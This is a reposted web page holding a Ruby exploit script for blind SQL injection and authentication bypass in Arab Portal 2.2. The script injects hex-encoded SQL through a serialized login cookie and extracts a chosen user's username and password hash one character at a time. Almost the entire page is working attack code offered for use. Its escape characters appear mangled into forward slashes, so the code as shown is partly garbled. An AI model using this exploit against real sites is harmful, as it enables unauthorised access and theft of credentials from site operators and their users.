网站建议:179001057@qq.com

Arab Portal 2.2 (Auth Bypass) Blind SQL Injection

技术2022-05-12  0

 

#!/usr/bin/ruby

#=============================================##          Arab Portal v2.2 Exploit           #,# Blind SQL Injection / Authentication Bypass ##  Discovered & written by: Jafer Al-Zidjali  ##         Email: jafer@scorpionds.com         ##         Website: www.scorpionds.com         ##=============================================#

require "net/http"require "base64"

intro=[          "+=============================================+",          "+          Arab Portal v2.2 Exploit           +",          "+ Blind SQL Injection / Authentication Bypass +",          "+  Discovered & written by: Jafer Al-Zidjali  +",          "+         Email: jafer@scorpionds.com         +",          "+         Website: www.scorpionds.com         +",          "+=============================================+"          ]

def print_intro text  w="|"  text.each do |str|    str.scan(/./) do |c|        STDOUT.flush      if w=="|"         print "/b"+c +w        w="/"      elsif w=="/"         print "/b"+c +w        w="-"        elsif w=="-"         print "/b"+c +w        w="//"       else      print "/b"+c +w      w="|"      end      sleep 0.05    end    print "/b "    puts ""  endend

print_intro intro

puts "/nEnter host name (e.g. example.com):"host=gets.chomp

puts "/nEnter script path (e.g. /arabportal/):"path=gets.chomp

puts "/nEnter userid:"userid=gets.chomp

puts "/nGetting cookie value..."

http = Net::HTTP.new(host, 80)

resp= http.get(path)cookie = resp.response["set-cookie"]

len=cookie.split("; ").lengthmax=0login_info=""

len.times do |count|  clen=cookie.split("; ")[count].length    if clen > max then       max=clen       login_info=cookie.split("; ")[count]    endend

login_info=login_info.split(", ")

if login_info[0].length > login_info[1].lengthlogin_info=login_info[0]elselogin_info=login_info[1]end

login_info=login_info.split("=")[0]

puts "Cookie name is: "+login_info

puts "/nWhat do you want to do?"puts "1. Get username."puts "2. Get password hash."

opt=gets.chomp

if opt=="1"  unamelen=0  print "/nGetting username length"

  20.times do |x|    stmt="#{userid}"+                    "/x27/x20/x61/x6e/x64/x20/x6c"+                    "/x65/x6e/x67/x74/x68/x28/x75"+                    "/x73/x65/x72/x6e/x61/x6d/x65"+                    "/x29/x3d#{x}/x20/x6f/x72/x20/x27/x27/x3d/x27"

    shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+              "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+              "/x72/x61/x62/x70/x6f/x72/x74/x61"+              "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+              "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+              stmt.length.to_s+              "/x3a/x22"+              stmt+              "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+              "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+              "/x31/x3a/x22/x61/x22/x3b/x7d"

    header={                  "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")    }

    resp= http.get(path,header)    if resp.body =~ /action=logout/      puts "/nLength is: #{x}"      unamelen=x      break    else        print "."        STDOUT.flush    end  end

  chars="abcdefghijklmnopqrstuvwxyz0123456789"

  print "/nGetting username: "  unamelen.times do |z|    chars.scan(/./) do |c|        stmt="#{userid}"+                        "/x27/x20/x61/x6e/x64/x20/x73"+                        "/x75/x62/x73/x74/x72/x69/x6e"+                        "/x67/x28/x75/x73/x65/x72/x6e"+                        "/x61/x6d/x65/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27/x20/x6f/x72/x20/x27/x27/x3d/x27"

        shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+                  "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+                  "/x72/x61/x62/x70/x6f/x72/x74/x61"+                  "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+                  "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+                  stmt.length.to_s+                  "/x3a/x22"+                  stmt+                  "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+                  "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+                  "/x31/x3a/x22/x61/x22/x3b/x7d"

        header={                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")        }        print c        STDOUT.flush        http = Net::HTTP.new(host, 80)        resp= http.get(path,header)        if resp.body =~ /action=logout/          break        end        print "/b"    end  end  puts "/nHave fun :)"

elsif opt=="2"  chars="0123456789abcdef"

  print "/nGetting password hash: "  32.times do |z|    chars.scan(/./) do |c|        stmt="#{userid}"+                        "/x27/x20/x61/x6e/x64/x20/x73/x75"+                        "/x62/x73/x74/x72/x69/x6e/x67/x28"+                        "/x70/x61/x73/x73/x77/x6f/x72/x64"+                        "/x2c#{z+1}/x2c/x31/x29/x3d/x27#{c}/x27"+                        "/x20/x6f/x72/x20/x27/x27/x3d/x27"         shellcode="/x61/x3a/x35/x3a/x7b/x69/x3a/x30"+                  "/x3b/x73/x3a/x31/x30/x3a/x22/x61"+                  "/x72/x61/x62/x70/x6f/x72/x74/x61"+                  "/x6c/x22/x3b/x69/x3a/x31/x3b/x69"+                  "/x3a/x31/x3b/x69/x3a/x32/x3b/x73/x3a"+                  stmt.length.to_s+                  "/x3a/x22"+                  stmt+                  "/x22/x3b/x69/x3a/x33/x3b/x69/x3a"+                  "/x30/x3b/x69/x3a/x34/x3b/x73/x3a"+                  "/x31/x3a/x22/x61/x22/x3b/x7d"        header={                      "Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(//s/,"")        }        print c        STDOUT.flush        http = Net::HTTP.new(host, 80)        resp= http.get(path,header)        if resp.body =~ /action=logout/           break        end        print "/b"    end  end  puts "/nHave fun :)"end

 


最新回复(0)